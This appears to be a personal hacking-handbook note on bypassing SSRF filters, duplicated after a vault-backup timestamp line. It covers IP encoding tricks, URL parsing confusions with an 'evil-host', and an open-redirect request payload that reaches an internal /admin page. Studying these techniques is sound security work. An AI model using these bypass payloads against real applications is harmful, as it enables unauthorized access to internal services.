handbook/tools/3.Web-Hacking/4.Injection/SSRF/Notes/3.Bypassing-SSRF-Defenses.md


## Bypassing SSRF Defenses

It is common to see applications containing SSRF behavior together with defenses aimed at preventing malicious exploitation. Often, these defenses can be circumvented.

Bypassing Blacklist-Based Input Filters
- Applications often block input containing hostnames (127.0.0.1) or URLs (/admin)

- Bypass in these ways:
	- Use an alternative IP representation of 127.0.0.1 (21307066433)
	- Register your own domain that resolves to 127.0.0.1 (spoofed.burpcollaborator.net)
	- Obfuscate block strings using URL encoding or case variation

Bypassing Whitelist-Based Input Filters
```
- Embed creds in a URL before the hostname:
https://expected-host@evil
-host
```

- Use the # character to indicate a URL fragment:
```
https://evil-
host#expected-host
```

- Leverage DNS naming hierarchy to place required input into a fully-qualified DNS name you control:
```
https://expected-host.evil
-host
```

- URL-encode characters to confuse the URL-parsing code

- Combine these various techniques together

Bypassing with Open Redirection
- Suppose the following is true:
	- User-submitted URL is strictly validated
	- Application contains an open redirection vulnerability
- Construct a URL that meets the filter but redirects to a back-end target
```
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://1
92.168.0.68/admin
```
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## Bypassing SSRF Defenses`

			`It is common to see applications containing SSRF behavior together with defenses aimed at preventing malicious exploitation. Often, these defenses can be circumvented.`

			`Bypassing Blacklist-Based Input Filters`
			`- Applications often block input containing hostnames (127.0.0.1) or URLs (/admin)`

			`- Bypass in these ways:`
			`- Use an alternative IP representation of 127.0.0.1 (21307066433)`
			`- Register your own domain that resolves to 127.0.0.1 (spoofed.burpcollaborator.net)`
			`- Obfuscate block strings using URL encoding or case variation`

			`Bypassing Whitelist-Based Input Filters`
			```
			`- Embed creds in a URL before the hostname:`
			`https://expected-host@evil`
			`-host`
			```

			`- Use the # character to indicate a URL fragment:`
			```
			`https://evil-`
			`host#expected-host`
			```

			`- Leverage DNS naming hierarchy to place required input into a fully-qualified DNS name you control:`
			```
			`https://expected-host.evil`
			`-host`
			```

			`- URL-encode characters to confuse the URL-parsing code`

			`- Combine these various techniques together`

			`Bypassing with Open Redirection`
			`- Suppose the following is true:`
			`- User-submitted URL is strictly validated`
			`- Application contains an open redirection vulnerability`
			`- Construct a URL that meets the filter but redirects to a back-end target`
			```
			`POST /product/stock HTTP/1.0`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 118`
			`stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://1`
			`92.168.0.68/admin`
			```